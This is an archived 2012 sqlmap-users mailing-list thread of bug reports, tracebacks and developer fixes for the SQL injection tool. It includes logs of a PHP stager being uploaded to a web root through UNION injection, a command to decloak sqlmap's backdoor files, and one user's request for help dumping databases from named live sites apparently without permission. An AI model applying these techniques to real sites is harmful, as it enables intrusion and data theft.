[Y/n] >> [13:08:33] [INFO] the file has been successfully written and its size >> is 6969 bytes, but the size differs from the local file >> '/tmp/tmpo2EvI1' (703 bytes) >> [13:08:33] [WARNING] expect junk characters inside the file as a >> leftover from UNION query >> [13:08:33] [WARNING] HTTP error codes detected during testing: >> 404 (Not Found) - 2 times >> [13:08:33] [INFO] fetched data logged to text files under >> '/home/robin/tools/web/sqlmap/output/192.168.50.22' >> >> >> ------------------------------------------------------------------------------ >> Got visibility? >> Most devs has no idea what their production app looks like. >> Find out how fast your code is with AppDynamics Lite. >> http://ad.doubleclick.net/clk;262219671;13503038;y? >> http://info.appdynamics.com/FreeJavaPerformanceDownload.html >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > Miroslav Stampar > http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2012-09-14 12:50:00
|
Hi.

Original stager(.php) size is indeed 703 bytes, so sqlmap is not wrong in your case. You can check it by going into ./shell and running: "find backdoor.*_ stager.*_ -type f -exec python ../extra/cloak/cloak.py -d -i '{}' \;"

If you want to debug you could try watching traffic with -v 5 or by capturing it with -t traffic.txt. Maybe something interesting could be found there.

Kind regards,
Miroslav Stampar

On Fri, Sep 14, 2012 at 2:12 PM, Robin Wood <ro...@di...> wrote:
> Looks like you've updated the shell sent over with os-shell but not
> updated the size that the script checks to see if it exists.
>
> Robin
>
> [13:08:22] [WARNING] unable to retrieve the web server document root
> please provide the web server document root [/var/www/]:
> /var/www/html/upload/
> [13:08:29] [WARNING] unable to retrieve any web server path
> please provide any additional web server full path to try to upload
> the agent [Enter for None]:
> [13:08:30] [WARNING] unable to upload the file stager on
> '/var/www/html/upload'
> [13:08:30] [INFO] trying to upload the file stager via UNION technique
> do you want confirmation that the file
> '/var/www/html/upload/tmpuivks.php' has been successfully written on
> the back-end DBMS file system? [Y/n]
> [13:08:33] [INFO] the file has been successfully written and its size
> is 6969 bytes, but the size differs from the local file
> '/tmp/tmpo2EvI1' (703 bytes)
> [13:08:33] [WARNING] expect junk characters inside the file as a
> leftover from UNION query
> [13:08:33] [WARNING] HTTP error codes detected during testing:
> 404 (Not Found) - 2 times
> [13:08:33] [INFO] fetched data logged to text files under
> '/home/robin/tools/web/sqlmap/output/192.168.50.22'
>
>
> ------------------------------------------------------------------------------
> Got visibility?
> Most devs has no idea what their production app looks like.
> Find out how fast your code is with AppDynamics Lite.
> http://ad.doubleclick.net/clk;262219671;13503038;y?
> http://info.appdynamics.com/FreeJavaPerformanceDownload.html
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Miroslav Stampar
http://about.me/stamparm |
From: Robin W. <ro...@di...> - 2012-09-14 12:40:27
|
Looks like you've updated the shell sent over with os-shell but not updated the size that the script checks to see if it exists.

Robin

[13:08:22] [WARNING] unable to retrieve the web server document root
please provide the web server document root [/var/www/]: /var/www/html/upload/
[13:08:29] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [Enter for None]:
[13:08:30] [WARNING] unable to upload the file stager on '/var/www/html/upload'
[13:08:30] [INFO] trying to upload the file stager via UNION technique
do you want confirmation that the file '/var/www/html/upload/tmpuivks.php' has been successfully written on the back-end DBMS file system? [Y/n]
[13:08:33] [INFO] the file has been successfully written and its size is 6969 bytes, but the size differs from the local file '/tmp/tmpo2EvI1' (703 bytes)
[13:08:33] [WARNING] expect junk characters inside the file as a leftover from UNION query
[13:08:33] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 2 times
[13:08:33] [INFO] fetched data logged to text files under '/home/robin/tools/web/sqlmap/output/192.168.50.22' |
From: Miroslav S. <mir...@gm...> - 2012-09-10 20:43:23
|
Hi. Find it fixed now [1]. Bye. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/issues/180 On Mon, Sep 10, 2012 at 10:30 PM, André Silva <and...@gm...> wrote: > Hi, > > After syncing the lastest sqlmap version... > > root@bt:/pentest/database/sqlmap-dev# python2.6 sqlmap.py > Traceback (most recent call last): > File "sqlmap.py", line 15, in <module> > from _sqlmap import main > File "/pentest/database/sqlmap-dev/_sqlmap.py", line 17, in <module> > from lib.controller.controller import start > File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line > 11, in <module> > from lib.controller.action import action > File "/pentest/database/sqlmap-dev/lib/controller/action.py", line 8, in > <module> > from lib.controller.handler import setHandler > File "/pentest/database/sqlmap-dev/lib/controller/handler.py", line 22, > in <module> > from plugins.dbms.mssqlserver import MSSQLServerMap > File > "/pentest/database/sqlmap-dev/plugins/dbms/mssqlserver/__init__.py", line > 11, in <module> > from plugins.dbms.mssqlserver.enumeration import Enumeration > File > "/pentest/database/sqlmap-dev/plugins/dbms/mssqlserver/enumeration.py", > line 29, in <module> > from plugins.generic.enumeration import Enumeration as > GenericEnumeration > File "/pentest/database/sqlmap-dev/plugins/generic/enumeration.py", line > 20, in <module> > from plugins.generic.entries import Entries > File "/pentest/database/sqlmap-dev/plugins/generic/entries.py", line 45, > in <module> > from lib.utils.pivotdumptable import pivotDumpTable > ImportError: No module named pivotdumptable > > > Regards > > 2012/8/31 el draco <el...@gm...> > >> [13:07:45] [CRITICAL] unhandled exception in sqlmap/1.0-dev-33980ad, >> retry your run with the latest development version from the GitHub >> repository. If the exception persists, please send by e-mail to >> 'sql...@li...' 
or open a new issue at >> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the >> following text and any information required to reproduce the bug. The >> developers will try to reproduce the bug, fix it accordingly and get >> back to you. >> sqlmap version: 1.0-dev-33980ad >> Python version: 2.7.3 >> Operating system: posix >> Command line: ./sqlmap.py -u >> **************************************************** -D >> *************** --dump --replicate -T ******** --start=101 --stop=500 >> Technique: UNION >> Back-end DBMS: MySQL (fingerprinted) >> Traceback (most recent call last): >> File "/home/xxx/sqlmap/sqlmap-dev/_sqlmap.py", line 72, in main >> start() >> File "/home/xxx/sqlmap/sqlmap-dev/lib/controller/controller.py", >> line 563, in start >> action() >> File "/home/xxx/sqlmap/sqlmap-dev/lib/controller/action.py", line >> 110, in action >> conf.dbmsHandler.dumpTable() >> File "/home/xxx/sqlmap/sqlmap-dev/plugins/generic/entries.py", line >> 439, in dumpTable >> conf.dumper.dbTableValues(kb.data.dumpedTable) >> File "/home/xxx/sqlmap/sqlmap-dev/lib/core/dump.py", line 392, in >> dbTableValues >> rtable = replication.createTable(table, cols) >> File "/home/xxx/sqlmap/sqlmap-dev/lib/core/replication.py", line 96, >> in createTable >> return Replication.Table(parent=self, name=tblname, >> columns=columns, typeless=typeless) >> File "/home/xxx/sqlmap/sqlmap-dev/lib/core/replication.py", line 56, >> in __init__ >> self.parent.cursor.execute('DROP TABLE IF EXISTS "%s"' % self.name) >> OperationalError: database is locked >> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. 
http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > -- Miroslav Stampar http://about.me/stamparm |
From: André S. <and...@gm...> - 2012-09-10 20:30:09
|
Hi,

After syncing the latest sqlmap version...

root@bt:/pentest/database/sqlmap-dev# python2.6 sqlmap.py
Traceback (most recent call last):
  File "sqlmap.py", line 15, in <module>
    from _sqlmap import main
  File "/pentest/database/sqlmap-dev/_sqlmap.py", line 17, in <module>
    from lib.controller.controller import start
  File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line 11, in <module>
    from lib.controller.action import action
  File "/pentest/database/sqlmap-dev/lib/controller/action.py", line 8, in <module>
    from lib.controller.handler import setHandler
  File "/pentest/database/sqlmap-dev/lib/controller/handler.py", line 22, in <module>
    from plugins.dbms.mssqlserver import MSSQLServerMap
  File "/pentest/database/sqlmap-dev/plugins/dbms/mssqlserver/__init__.py", line 11, in <module>
    from plugins.dbms.mssqlserver.enumeration import Enumeration
  File "/pentest/database/sqlmap-dev/plugins/dbms/mssqlserver/enumeration.py", line 29, in <module>
    from plugins.generic.enumeration import Enumeration as GenericEnumeration
  File "/pentest/database/sqlmap-dev/plugins/generic/enumeration.py", line 20, in <module>
    from plugins.generic.entries import Entries
  File "/pentest/database/sqlmap-dev/plugins/generic/entries.py", line 45, in <module>
    from lib.utils.pivotdumptable import pivotDumpTable
ImportError: No module named pivotdumptable

Regards

2012/8/31 el draco <el...@gm...>
> [13:07:45] [CRITICAL] unhandled exception in sqlmap/1.0-dev-33980ad,
> retry your run with the latest development version from the GitHub
> repository. If the exception persists, please send by e-mail to
> 'sql...@li...' or open a new issue at
> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the
> following text and any information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get
> back to you.
> sqlmap version: 1.0-dev-33980ad
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap.py -u
> **************************************************** -D
> *************** --dump --replicate -T ******** --start=101 --stop=500
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "/home/xxx/sqlmap/sqlmap-dev/_sqlmap.py", line 72, in main
>     start()
>   File "/home/xxx/sqlmap/sqlmap-dev/lib/controller/controller.py",
> line 563, in start
>     action()
>   File "/home/xxx/sqlmap/sqlmap-dev/lib/controller/action.py", line
> 110, in action
>     conf.dbmsHandler.dumpTable()
>   File "/home/xxx/sqlmap/sqlmap-dev/plugins/generic/entries.py", line
> 439, in dumpTable
>     conf.dumper.dbTableValues(kb.data.dumpedTable)
>   File "/home/xxx/sqlmap/sqlmap-dev/lib/core/dump.py", line 392, in
> dbTableValues
>     rtable = replication.createTable(table, cols)
>   File "/home/xxx/sqlmap/sqlmap-dev/lib/core/replication.py", line 96,
> in createTable
>     return Replication.Table(parent=self, name=tblname,
> columns=columns, typeless=typeless)
>   File "/home/xxx/sqlmap/sqlmap-dev/lib/core/replication.py", line 56,
> in __init__
>     self.parent.cursor.execute('DROP TABLE IF EXISTS "%s"' % self.name)
> OperationalError: database is locked
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> |
From: Miroslav S. <mir...@gm...> - 2012-09-01 21:53:34
|
Hi.

Thank you for reporting and find it fixed now [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/170

On Fri, Aug 31, 2012 at 6:23 PM, el draco <el...@gm...> wrote:
> [13:07:45] [CRITICAL] unhandled exception in sqlmap/1.0-dev-33980ad,
> retry your run with the latest development version from the GitHub
> repository. If the exception persists, please send by e-mail to
> 'sql...@li...' or open a new issue at
> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the
> following text and any information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get
> back to you.
> sqlmap version: 1.0-dev-33980ad
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap.py -u
> **************************************************** -D
> *************** --dump --replicate -T ******** --start=101 --stop=500
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "/home/xxx/sqlmap/sqlmap-dev/_sqlmap.py", line 72, in main
>     start()
>   File "/home/xxx/sqlmap/sqlmap-dev/lib/controller/controller.py",
> line 563, in start
>     action()
>   File "/home/xxx/sqlmap/sqlmap-dev/lib/controller/action.py", line
> 110, in action
>     conf.dbmsHandler.dumpTable()
>   File "/home/xxx/sqlmap/sqlmap-dev/plugins/generic/entries.py", line
> 439, in dumpTable
>     conf.dumper.dbTableValues(kb.data.dumpedTable)
>   File "/home/xxx/sqlmap/sqlmap-dev/lib/core/dump.py", line 392, in
> dbTableValues
>     rtable = replication.createTable(table, cols)
>   File "/home/xxx/sqlmap/sqlmap-dev/lib/core/replication.py", line 96,
> in createTable
>     return Replication.Table(parent=self, name=tblname,
> columns=columns, typeless=typeless)
>   File "/home/xxx/sqlmap/sqlmap-dev/lib/core/replication.py", line 56,
> in __init__
>     self.parent.cursor.execute('DROP TABLE IF EXISTS "%s"' % self.name)
> OperationalError: database is locked
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Miroslav Stampar
http://about.me/stamparm |
From: el d. <el...@gm...> - 2012-08-31 16:24:26
|
[13:07:45] [CRITICAL] unhandled exception in sqlmap/1.0-dev-33980ad, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-33980ad
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap.py -u **************************************************** -D *************** --dump --replicate -T ******** --start=101 --stop=500
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "/home/xxx/sqlmap/sqlmap-dev/_sqlmap.py", line 72, in main
    start()
  File "/home/xxx/sqlmap/sqlmap-dev/lib/controller/controller.py", line 563, in start
    action()
  File "/home/xxx/sqlmap/sqlmap-dev/lib/controller/action.py", line 110, in action
    conf.dbmsHandler.dumpTable()
  File "/home/xxx/sqlmap/sqlmap-dev/plugins/generic/entries.py", line 439, in dumpTable
    conf.dumper.dbTableValues(kb.data.dumpedTable)
  File "/home/xxx/sqlmap/sqlmap-dev/lib/core/dump.py", line 392, in dbTableValues
    rtable = replication.createTable(table, cols)
  File "/home/xxx/sqlmap/sqlmap-dev/lib/core/replication.py", line 96, in createTable
    return Replication.Table(parent=self, name=tblname, columns=columns, typeless=typeless)
  File "/home/xxx/sqlmap/sqlmap-dev/lib/core/replication.py", line 56, in __init__
    self.parent.cursor.execute('DROP TABLE IF EXISTS "%s"' % self.name)
OperationalError: database is locked |
From: Miroslav S. <mir...@gm...> - 2012-08-31 08:24:03
|
Hi David.

What is the content of that OUTPUT.txt? Does it have any link with GET parameters inside?

Kind regards,
Miroslav Stampar

--
Miroslav Stampar
http://about.me/stamparm
|
From: David L. <bak...@gm...> - 2012-08-31 06:36:18
|
Commands: ./sqlmap.py -m OUPUT.txt

results: [10:20:38] [INFO] parsing multiple targets list from 'OUTPUT.txt'

[*] shutting down at 10:20:40

I didn't have this problem with previous versions.
|
From: Chris O. <chr...@gm...> - 2012-08-30 20:49:48
|
Mentioning live sites on the list... grumble...
|
From: <du...@al...> - 2012-08-30 19:21:33
|
Since you mentioned "not doing anything illegal", I will just say that checking people's doors and windows to see if they are open or weak is not ok even if it's fun and all (but if the site you are testing on has given you permission, or if you own it, then hack away to your heart's content).

Anyway, to the issue at hand. Are you using the latest development version of sqlmap? If not, then I recommend you do that, since it gets new features and updates all the time, and you will probably see your issue solved there.

If you don't have git, then get it, and then do:

git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

//C
|
From: Arturs P. <lva...@in...> - 2012-08-30 15:06:13
|
Hi!
Basically this question is about what Havij does and how to do the same w/ SQLMap (or better). I made injections and was able to dump database with Havij in this site - http://nhl.id.lv/?cat=stats&position=Goalie&sort=saves through parameter 'sort'. It used MySQL timebased injection (time is usually 4.x seconds or 3.x - I was not able to set SQLMap to milliseconds or seconds with commas or points) and retrieved all the needed data using slow guessing letters method. But it did the job although it was very slow. With SQLMap it detects MySQL timebased blind, but is not able to retrieve any data. Payload says that there is a possibility of IDS/IPS defence. What should I do to get the database name? Any tampering scripts or combinations of them? Is it possible to get the names of DBs and tables faster than Havij slo-mo guessing?
There's another site with which I have a similar problem. That's http://hack-games.com . I set crawling to 2 and use parameters 'doaction' or 'pmid' . SQLMap finds blind boolean injection, but once again hits the IDS/IPS defence. Havij on the same page only without crawling (I specified the page SQLMap found while crawling, but don't remember it :D) found the DB, but it wasn't able to get normal characters instead of square boxes. That is probably just an encoding issue.
Could anyone help me to sort out this situation?

P.S.
Havij also does database name character count retrieval, before guessing the numbers. I'm not sure if SQLMap has such function.
P.P.S.
I won't use your help to do something illegal with SQLMap, I'm just having fun from hacking. No harm done to any of higher mentioned or any other webpages.
|
From: Duarte S. <dua...@se...> - 2012-08-29 20:50:44
|
No problem Miroslav.

Regards,
Duarte Silva
|
From: Miroslav S. <mir...@gm...> - 2012-08-29 19:31:43
|
Hi Duarte.

You've helped a lot with given details. Find those bugs fixed [1][2] with the latest commit(s).

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/166
[2] https://github.com/sqlmapproject/sqlmap/issues/167

--
Miroslav Stampar
http://about.me/stamparm
|
From: Duarte S. <dua...@se...> - 2012-08-29 14:49:58
|
Hello Miroslav,

> I'll need more information. For starter, does this BigArray issue start all
> of a sudden or during the whole sqlmap run?

At the end of dumping the data, sqlmap outputs a subset of the dumped data, after that, the error appears. It happens with a ~8000 rows table.

> Also, it's kind of strange to see "AttributeError("'NoneType' object has no
> attribute 'remove'",) in <bound method BigArray.__del__" because only
> remove method used there is a one from standard system module "os" which
> for sure exists.

sqlmap does not crash with this error, it simply outputs it. I'm not sure but maybe it has something to do with the garbage collection (?).

> Could you please send some console output that happens prior to the
> "Exception AttributeError: AttributeError("'NoneType'"?

Will do so off list.

> For heuristic problem it would be great if you could provide either a
> traffic file (--flush-session -t traffic.txt) or url itself.

Same as above :P

Regards,
Duarte Silva
|
From: Miroslav S. <mir...@gm...> - 2012-08-28 23:41:43
|
Hi Duarte.

I'll need more information. For starter, does this BigArray issue start all of a sudden or during the whole sqlmap run?

Also, it's kind of strange to see "AttributeError("'NoneType' object has no attribute 'remove'",) in <bound method BigArray.__del__" because only remove method used there is a one from standard system module "os" which for sure exists.

Could you please send some console output that happens prior to the "Exception AttributeError: AttributeError("'NoneType'"?

For heuristic problem it would be great if you could provide either a traffic file (--flush-session -t traffic.txt) or url itself.

Kind regards,
Miroslav Stampar

On Sun, Aug 26, 2012 at 11:33 AM, Duarte Silva <dua...@se...> wrote:
> Hi all,
>
> when sqlmap is dumping a sample of table data I get this:
>
> > Exception AttributeError: AttributeError("'NoneType' object has no attribute
> > 'remove'",) in <bound method BigArray.__del__ of ...> ignored
>
> This tends to happen with big dumps, that error shows for each column
> extracted from the table.
>
> The other problem is that sqlmap heuristics aren't able to identify the
> database correctly. The webpage shows the following error
>
> > Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
> > resource in /home/(...) on line 17
> >
> > Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
> > resource in /home/(...) on line 70
>
> Sqlmap writes unknown DBMS in the heuristics message. I have sqlmap updated up
> to commit 2af1313010c539adb179cbe4bca988c1213cee13.
>
> Regards,
> Duarte Silva

--
Miroslav Stampar
http://about.me/stamparm
|
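The "'NoneType' object has no attribute 'remove'" warning in the thread above has the shape Python 2 prints when a leftover object's `__del__` runs at interpreter shutdown after module globals such as `os` have already been set to None. The sketch below is an added example, not sqlmap's BigArray code and not the project's fix: `FragileChunk`, `RobustChunk` and `finalize_during_teardown` are hypothetical names, and shutdown is simulated by setting this module's `os` global to None.

```python
import os
import tempfile


class FragileChunk(object):
    """Disk-backed chunk whose finalizer looks up the `os` global when it runs."""

    def __init__(self):
        fd, self.filename = tempfile.mkstemp(prefix="chunk-")
        os.close(fd)

    def __del__(self):
        # If the module global `os` is already None, this line raises
        # AttributeError: 'NoneType' object has no attribute 'remove'.
        os.remove(self.filename)


class RobustChunk(object):
    """Same idea, but cleanup does not depend on module globals being alive."""

    def __init__(self):
        fd, self.filename = tempfile.mkstemp(prefix="chunk-")
        os.close(fd)
        # Keep our own reference to the function; it stays valid even if
        # the module-level name `os` is later rebound to None.
        self._remove = os.remove

    def close(self):
        # getattr() covers the case where __init__ failed before setting it.
        filename = getattr(self, "filename", None)
        self.filename = None
        if filename is not None:
            try:
                self._remove(filename)
            except OSError:
                pass  # already gone; nothing left to clean up

    # Deterministic cleanup: `with RobustChunk() as chunk:` removes the file
    # on exit instead of waiting for garbage collection.
    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc, tb):
        self.close()

    def __del__(self):
        self.close()


def finalize_during_teardown(chunk):
    """Call chunk.__del__() while this module's `os` global is None.

    Returns the error text, or None if the finalizer ran cleanly. Calling
    __del__ directly lets the exception propagate; when the interpreter
    calls it, the exception is only printed and then ignored.
    """
    global os
    saved, os = os, None  # simulated shutdown state (assumption of this sketch)
    try:
        chunk.__del__()
        return None
    except AttributeError as ex:
        return str(ex)
    finally:
        os = saved


def demo():
    fragile, robust = FragileChunk(), RobustChunk()
    fragile_path, robust_path = fragile.filename, robust.filename
    return {
        "fragile_error": finalize_during_teardown(fragile),
        "fragile_file_left": os.path.exists(fragile_path),
        "robust_error": finalize_during_teardown(robust),
        "robust_file_left": os.path.exists(robust_path),
    }


if __name__ == "__main__":
    for key, value in sorted(demo().items()):
        print("%s: %r" % (key, value))
```

The fragile finalizer fails and leaves its temporary file behind, which is why such warnings tend to come with stale files in the temp directory after large dumps.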
From: James <ja...@ev...> - 2012-08-27 13:49:02
|
Dummy.

On 08/27/2012 08:58 AM, Roberto Neves wrote:
> For now the havij is still the best scan sqlinjection.
> SqlMap can not scan the many URLs.
> Example havij the scaneia http://allindiabirdingtours.com/index.php?id=6
> very easily and quickly. The SqlMap not.
|
From: <du...@al...> - 2012-08-27 13:34:44
|
Actually, SqlMap is far superior to Havij, and the only reason you like it is because you simply don't know any better; you are too lazy to learn how SqlMap works and how to use its power. For me Havij has always been a tool for kids, and your mail seems to prove my reasoning to be correct. I suggest you study some more.

PS: Havij is closed source and costs money. Seriously?! Are you on crack or something?

On 27.08.2012 14:58, Roberto Neves wrote:
> For now the havij is still the best scan sqlinjection.
> SqlMap can not scan the many URLs.
> Example havij the scaneia
> http://allindiabirdingtours.com/index.php?id=6
> very easily and quickly. The SqlMap not.
|